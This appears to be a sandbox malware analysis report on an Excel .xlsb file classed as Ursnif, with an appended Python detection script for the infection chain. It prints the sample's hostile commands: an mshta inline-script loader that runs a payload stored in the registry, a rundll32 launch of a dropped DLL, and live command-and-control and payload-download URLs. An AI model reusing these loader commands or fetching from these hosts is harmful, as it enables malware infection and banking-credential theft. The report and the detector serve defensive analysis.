Analysis Report File_78476.xlsb

Overview

General Information

Sample Name: File_78476.xlsb
Analysis ID: 352546
MD5: 77927a0a05cc284ca6e904563cf81f20
SHA1: 0ffd8f1b079a75f143cd601d832e1a5e2f651818
SHA256: d46861839e12139c03aceef7f735426d794809344f18d8b2053377dcb1ebd470

Most interesting Screenshot:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Multi AV Scanner detection for domain / URL
Yara detected Ursnif
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Writes registry values via WMI
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the installation date of Windows
Searches for the Microsoft Outlook file path
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 6696 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 7104 cmdline: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\fsh\87.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • iexplore.exe (PID: 2288 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6024 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2288 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 5748 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2288 CREDAT:82952 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6336 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2288 CREDAT:17430 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 5428 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "version": "250171", "uptime": "226", "system": "53111af62e035434ff52895482ef7b78hhw", "size": "202829", "crc": "2", "action": "00000000", "id": "1100", "time": "1613184313", "user": "f73be0088695dc15e71ab15c2aa7c3e0", "hash": "0xf857f57e", "soft": "3"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000003.484929367.0000000005CE8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000001.00000003.484909959.0000000005CE8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000001.00000003.491441332.0000000005B6B000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000001.00000003.484870003.0000000005CE8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000001.00000003.484795532.0000000005CE8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started; Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team; Data: Command: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\fsh\87.dll,DllRegisterServer, CommandLine: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\fsh\87.dll,DllRegisterServer, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6696, ProcessCommandLine: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\fsh\87.dll,DllRegisterServer, ProcessId: 7104

Signature Overview

AV Detection:

Found malware configuration
Source: rundll32.exe.7104.1.memstr, Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250171", "uptime": "226", "system": "53111af62e035434ff52895482ef7b78hhw", "size": "202829", "crc": "2", "action": "00000000", "id": "1100", "time": "1613184313", "user": "f73be0088695dc15e71ab15c2aa7c3e0", "hash": "0xf857f57e", "soft": "3"}
Multi AV Scanner detection for domain / URL
Source: c56.lepini.at, Virustotal: Detection: 8%
Source: api3.lepini.at, Virustotal: Detection: 10%
Source: api10.laptok.at, Virustotal: Detection: 10%

Compliance:

Uses new MSVCR Dlls
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, File opened: C:\Windows\SysWOW64\MSVCR100.dll
Uses secure TLS version for HTTPS connections
Source: unknown, HTTPS traffic detected: 162.241.169.26:443 -> 192.168.2.3:49731 version: TLS 1.2
Binary contains paths to debug symbols
Source: Binary string: c:\Campenergy\wouldShoulder\learnable\motion.pdb source: 11[1].dll.0.dr

Software Vulnerabilities:

Document exploit detected (creates forbidden files)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\11[1].dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, File created: C:\ProgramData\fsh\87.dll
Document exploit detected (drops PE files)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, File created: 11[1].dll.0.dr
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, Section loaded: unknown origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, Process created: C:\Windows\SysWOW64\rundll32.exe
HTTP GET or POST without a user agent
Source: global traffic, HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: c56.lepini.at
Internet Provider seen in connection with other malware
Source: Joe Sandbox View, ASN Name: GOOGLEUS GOOGLEUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown, TCP traffic detected without corresponding DNS query: 139.162.191.228
Source: global traffic, HTTP traffic detected: GET /campo/m/m HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 139.162.191.228 | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /api1/NHDZE5NC0p4/EA1Rau0QpdKGS3/WTlj_2B7vKVxuNa_2F_2B/LYVSumGe5smX_2BD/OTX07ZqQ_2BIY5i/gaJx2nrBRbCwokKD6i/TmP3yOyRd/UIWhx47302AAtFE31oP0/QH6kOp10Kt5yvTIaAYa/LK0GUog4M1OCTVMD4H5Cd4/y7Hidc3RQ475o/Nxk1_2FU/AOpYSuCaFqv8yJoz1d98uE0/RGNbcUJDfT/THwRpNZtVSPwcxLQu/JgOmTTbGBEY6/RAYX3HI935J/bkHevlKXRebACN/zYCEHnvaIKYWA35nI5OI7/Zng6uRiwb/9FNesaJS HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: api10.laptok.at | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /favicon.ico HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: api10.laptok.at | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /api1/FnFXZRWsgaOv/P6JvZtKT1UO/agHdP9HeJ299dx/NjFG3Ft3KB32OuetXL2sT/DABW2CvkhTj1mHcu/d2rOfCnZM39ngVM/pgEkPfy7WZBHt2_2BI/8hIbLV9eh/Nxh_2BSaIH1v25_2Fy2g/jQtR51J9UQmW5hGZQSs/bUByYCCGCjlzccS8n_2Fr1/2TxpWMxaih6Zd/1FC2e6YZ/ytawmZHSR4fCdrk_2BuzGs2/I_2Fe7DGRd/nrzf8JbWsmL4ZMLw8/AiFgBOzN747U/qJ5myKX5wF4/23oTR339hxhZPv/OxZ3q5cF_2BQi5HeJCCQ3/czqNoTGtPyg5zMIR/bO5RZf4FOlJ/J HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: api10.laptok.at | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /favicon.ico HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: api10.laptok.at | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /api1/zobiFDQnBaZYuwt/rfdusQHNImkOYENAMp/kT_2B2cd3/SGUJBC0FLMtXFEIZjgF4/X6JHa0dYaBh2VTFZ3ie/AQvPNAeKAbUpEx_2BIA_2F/yqBcCuGKcxWU4/7_2FDUSL/tmEKyuvK3UnsOb7GxJhyB1v/eAgP5jhU7c/4LQdBuTq0iBob66eg/RKZ75u7U2Jkq/Bh_2B1mS8Vw/lDNXKg1S3Gc5QV/zwawyAQoh3ycAGCJJd6YY/crMtievOTWbq6IjA/LAnATbCyag_2Bwn/5yU0_2BoSAkzUKbcl_/2BAXWx8K4/WLBZv2PnGv5crOgJCyib/ZVr6kC0SezCKLbzs2jt/2ZOSFMw HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: api10.laptok.at | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: c56.lepini.at
Source: global traffic, HTTP traffic detected: GET /api1/TsKcWE2WM/nJKmvtwztxYIvooVmlF8/f0GhZMHg0Zw5qyafREH/k8WCOuLk57UyBPUazjQh2Z/3S3ubdSMDgVaL/gAWRJwIA/ZCG7BHExQwWXeVA1UnuSBqn/i4n1PFTtlL/cwWi1gc5A_2Bt5DHa/KB0_2BLRegs0/BViXJpKwWgb/pjm_2BuXWxLo81/vWKBV9Fs7FvCc1nuX8q5n/wGeJRl_2FEvkYbfF/Pr91DmkaDab5rrv/0H_2FXSeTsgpPadA5E/E3CpLlb73/0qgYAbyOZODf4FqqEkA4/X5b8p4TRxQsXlnMDNwZ/TvAO43omBsbN/h HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 | Host: api3.lepini.at
Source: unknown, DNS traffic detected: queries for: cabogrupo.co.mz
Source: unknown, HTTP traffic detected: POST /api1/pmT_2FJ7yMpV_2FsxCGV/80ZJDlvhk5QH3DonF9p/gMZiDS0z2g2bNrJ_2Bv_2B/DXZEEWDxEnN_2/Bx7WHkRW/wpcaGRddIyctm9GWW0oCdyR/qDXQAt7J40/6ogNDJFenwl5gVncd/SbRM7SEjzx1B/lGa_2BU69FH/bDmPVUZABXfNqj/99lThSa0HHLaHhjsVvXGB/uCBX4Mj6I29IAbCC/UnujtjeNBz5OBuo/7XOr98uUHKNs6Ghu4C/k_2BIsFhF/UXse0hUo2oKU8zO8khsV/ZbPtcIIUg_2B2PD2b0Q/KHYH7l2X48hEAXFhsSFudS/huoP4e HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 | Content-Length: 2 | Host: api3.lepini.at
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 12 Feb 2021 17:45:13 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip | Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a | Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: sheet9.bin, String found in binary or memory: http://139.162.191.228/campo/m/m.D
Source: {7B42C275-6DA5-11EB-90E4-ECF4BB862DED}.dat.22.dr, ~DF045C60B1D61D61DD.TMP.22.dr, String found in binary or memory: http://api10.laptok.at/api1/FnFXZRWsgaOv/P6JvZtKT1UO/agHdP9HeJ299dx/NjFG3Ft3KB32OuetXL2sT/DABW2CvkhT
Source: ~DF78E812B899E938EF.TMP.22.dr, {7B42C273-6DA5-11EB-90E4-ECF4BB862DED}.dat.22.dr, String found in binary or memory: http://api10.laptok.at/api1/NHDZE5NC0p4/EA1Rau0QpdKGS3/WTlj_2B7vKVxuNa_2F_2B/LYVSumGe5smX_2BD/OTX07Z
Source: {7B42C277-6DA5-11EB-90E4-ECF4BB862DED}.dat.22.dr, String found in binary or memory: http://api10.laptok.at/api1/zobiFDQnBaZYuwt/rfdusQHNImkOYENAMp/kT_2B2cd3/SGUJBC0FLMtXFEIZjgF4/X6JHa0
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://store.office.de/addinstemplate
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://tasks.office.com
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://templatelogging.office.com/client/log
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://web.microsoftstream.com/video/
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://webshell.suite.office.com
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://wus2-000.contentsync.
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
            Source: 10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.drString found in binary or memory: https://www.odwebp.svc.ms
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownHTTPS traffic detected: 162.241.169.26:443 -> 192.168.2.3:49731 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            Yara detected Ursnif
            Source: Yara match | File source: 00000001.00000003.484929367.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.484909959.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.491441332.0000000005B6B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.484870003.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.484795532.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.484765467.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.484838302.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.484894517.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.484953925.0000000005CE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 7104, type: MEMORY

            E-Banking Fraud:

            Yara detected Ursnif (same nine memory-dump matches and the rundll32.exe PID 7104 process-memory match as listed under Key, Mouse, Clipboard, Microphone and Screen Capturing)

            System Summary:

            Office process drops PE file
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\11[1].dll
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\ProgramData\fsh\87.dll
            Writes registry values via WMI
            Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: classification engine | Classification label: mal100.troj.expl.winXLSB@11/20@12/3
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\{F1020262-3A5E-4343-9586-95E15C7BFAD3} - OProcSessId.dat
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File read: C:\Users\desktop.ini
            Source: C:\Windows\SysWOW64\rundll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\fsh\87.dll,DllRegisterServer
            Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
            Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2288 CREDAT:17410 /prefetch:2
            Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2288 CREDAT:82952 /prefetch:2
            Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2288 CREDAT:17430 /prefetch:2
            Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\fsh\87.dll,DllRegisterServer
            Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2288 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2288 CREDAT:82952 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2288 CREDAT:17430 /prefetch:2
            Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: File_78476.xlsb | Initial sample: OLE zip file path = docProps/thumbnail.wmf
            Source: File_78476.xlsb | Initial sample: OLE zip file path = xl/media/image1.png
            Source: File_78476.xlsb | Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
            Source: Binary string: c:\Campenergy\wouldShoulder\learnable\motion.pdb | source: 11[1].dll.0.dr
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\11[1].dll
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\ProgramData\fsh\87.dll
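            The process-creation entries above describe a chain worth detecting on endpoints: Excel spawning rundll32.exe on a DLL dropped under C:\ProgramData with the DllRegisterServer export, and mshta.exe running an inline about:<hta:application> script that eval()s a payload stored in an HKCU registry value. The following Python is an added example (not part of the Joe Sandbox report and not code from the sample): it applies three hypothetical triage rules to constructed process-creation events whose command lines are copied from this report, and it also parses the mshta regread() argument back into a plain registry path so a responder knows which value to collect. The parent of mshta.exe (explorer.exe), the rule names and the benign control event are assumptions, not facts from the report.

```python
"""Triage of process-creation events for the Excel -> rundll32 -> mshta chain in this report.

Added example; rule names are hypothetical and EVENTS is constructed from the
command lines in the sandbox report (the mshta parent is assumed), not real telemetry.
"""
import re
from typing import List, Optional

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SCRIPT_HOSTS = {"rundll32.exe", "mshta.exe", "regsvr32.exe", "wscript.exe",
                "cscript.exe", "cmd.exe", "powershell.exe"}
# Directories a standard user can write to; a DLL loaded by rundll32 from here is suspicious.
USER_WRITABLE_PREFIXES = ("c:\\programdata\\", "c:\\users\\", "c:\\windows\\temp\\")

# Absolute DLL path passed to rundll32, optionally followed by ",ExportName".
DLL_ARG = re.compile(r"((?:[a-z]:\\|\\\\)[^\s,'\"]+\.dll)(?:,(\w+))?", re.I)
# Single-quoted argument of WScript.Shell.regread(...) inside an inline HTA script.
REGREAD = re.compile(r"regread\(\s*'([^']*)'", re.I)

EVENTS = [
    {   # Excel (the document's host process) starting rundll32 on a DLL dropped under ProgramData
        "parent": r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE",
        "image": r"C:\Windows\SysWOW64\rundll32.exe",
        "cmdline": r"'C:\Windows\System32\rundll32.exe' C:\ProgramData\fsh\87.dll,DllRegisterServer",
    },
    {   # mshta running an inline HTA whose real script is read back from the registry
        "parent": r"C:\Windows\explorer.exe",  # assumed; the report lists the parent as unknown
        "image": r"C:\Windows\System32\mshta.exe",
        "cmdline": r"'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);"
                   r"eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow"
                   r"\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));"
                   r"if(!window.flag)close()</script>'",
    },
    {   # constructed benign control: rundll32 loading a system DLL from a normal parent
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\rundll32.exe",
        "cmdline": r"C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL",
    },
]


def image_name(path: str) -> str:
    """Lower-cased file name of an image path, tolerating quotes and forward slashes."""
    return path.strip("'\"").replace("/", "\\").rsplit("\\", 1)[-1].lower()


def office_spawned_script_host(ev: dict) -> bool:
    """Office application directly creating a script/DLL host (the Sigma-style rule in this report)."""
    return image_name(ev["parent"]) in OFFICE_IMAGES and image_name(ev["image"]) in SCRIPT_HOSTS


def rundll32_loads_user_writable_dll(ev: dict) -> Optional[str]:
    """Return 'path,Export' when rundll32 is given a DLL under a user-writable directory."""
    if image_name(ev["image"]) != "rundll32.exe":
        return None
    for dll, export in DLL_ARG.findall(ev["cmdline"]):
        if dll.lower().startswith(USER_WRITABLE_PREFIXES):
            return f"{dll},{export}" if export else dll
    return None


def inline_hta_script(ev: dict) -> bool:
    """mshta executing script supplied on the command line instead of from an .hta file."""
    cl = ev["cmdline"].lower()
    return image_name(ev["image"]) == "mshta.exe" and "about:" in cl and "<script" in cl


def regread_targets(cmdline: str) -> List[str]:
    """Registry values read by regread() in the command line, with JScript backslash escaping undone."""
    # JScript string literals double their backslashes (and '\S' is just 'S'), so collapsing
    # every run of backslashes to one yields the path a responder can query directly.
    return [re.sub(r"\\+", r"\\", raw) for raw in REGREAD.findall(cmdline)]


def triage(ev: dict) -> dict:
    """Apply all rules to one event and return the findings plus any registry values to collect."""
    findings = []
    if office_spawned_script_host(ev):
        findings.append("office_spawned_script_host")
    dll = rundll32_loads_user_writable_dll(ev)
    if dll:
        findings.append(f"rundll32_user_writable_dll:{dll}")
    if inline_hta_script(ev):
        findings.append("mshta_inline_hta")
    keys = regread_targets(ev["cmdline"])
    if keys:
        findings.append("script_stage_read_from_registry")
    return {"image": image_name(ev["image"]), "findings": findings, "registry_keys": keys}


def triage_all(events: List[dict]) -> List[dict]:
    """Only events that tripped at least one rule."""
    return [r for r in (triage(e) for e in events) if r["findings"]]


if __name__ == "__main__":
    for hit in triage_all(EVENTS):
        print(hit["image"], hit["findings"], hit["registry_keys"])
```

            Run as a script it reports the Excel-spawned rundll32 event and the mshta event and stays silent on the benign control. The extracted path HKCU\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\Actidsrv is the value to export from the infected user's hive before remediation, since the second-stage script lives there rather than on disk.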

            Hooking and other Techniques for Hiding and Protection:

            Yara detected Ursnif (same nine memory-dump matches and the rundll32.exe PID 7104 process-memory match as listed under Key, Mouse, Clipboard, Microphone and Screen Capturing)
